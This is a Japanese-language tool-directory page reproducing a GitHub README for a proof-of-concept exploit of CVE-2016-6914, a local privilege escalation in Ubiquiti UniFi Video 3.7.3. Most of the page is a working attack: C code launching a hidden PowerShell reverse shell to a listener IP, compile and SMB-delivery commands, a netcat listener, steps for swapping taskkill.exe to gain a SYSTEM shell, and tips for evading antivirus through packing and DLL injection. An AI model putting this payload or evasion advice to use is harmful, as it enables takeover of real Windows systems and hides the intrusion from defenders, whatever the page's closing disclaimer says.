Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
ツール/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
特権昇格エクスプロイトペネトレーションテスト学習と教育ペイロード開発バイナリエクスプロイト
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

🔥 概要

このリポジトリには、Ubiquiti UniFi Video 3.7.3 に影響するローカル権限昇格 (LPE) 脆弱性 CVE-2016-6914 の概念実証 (PoC) が含まれています。

低い権限の攻撃者は、C:\ProgramData\unifi-video\ 内の信頼されたバイナリ (taskkill.exe) を置き換えて、SYSTEM 権限で悪意のあるコードを実行できます。


⚡ 悪用

悪用手順

1️⃣ taskkill.exe を悪意のあるペイロード (exploit.exe) に置き換えます。 2️⃣ UniFi Video Service の実行を待つか、手動で再起動します。 3️⃣ 悪意のあるペイロードが実行され、SYSTEM シェルが取得されます。


🚀 含まれるペイロード

  • ✅ PowerShell リバースシェル
  • ✅ Netcat リバースシェル
  • ✅ AV バイパス手法

📜 PoC コード (PowerShell リバースシェル)

このペイロードは taskkill.exe を置き換え、リバースシェルを起動します。

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}

✅ MinGW を使用してコンパイル: x86_64-w64-mingw32-gcc exploit.c -o exploit.exe 🛠️ 使用方法 1️⃣ SMB 共有のセットアップ (リモートファイル配信用) Kali 上で実行: impacket-smbserver share . -smb2support 2️⃣ Netcat リスナーの起動 nc -lvnp 4444 3️⃣ ターゲットマシンへのペイロード配信 ターゲットシステム上で以下の PowerShell コマンドを実行します: copy \10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe stop-service UnifiVideoService -Force start-service UnifiVideoService 4️⃣ SYSTEM シェルの取得 実行されると、リスナー上に SYSTEM シェルが開きます!

🛡️ アンチウイルス (AV) の回避 基本的な AV 検出を回避するには、以下を試してください: ✔️ 実行ファイルのパッキング (UPX): upx --best --lzma exploit.exe ✔️ system() の代わりに代替 syscall を使用。 ✔️ DLL インジェクションを使用して正規プロセスに埋め込む。

⚠️ 免責事項 📢 この PoC は教育目的のみです! 🛑 許可のない使用は違法であり、罰せられます。 👨‍💻 法的かつ倫理的な方法でのみ使用してください。

参照:https://www.exploit-db.com/exploits/43390

ツールをダウンロード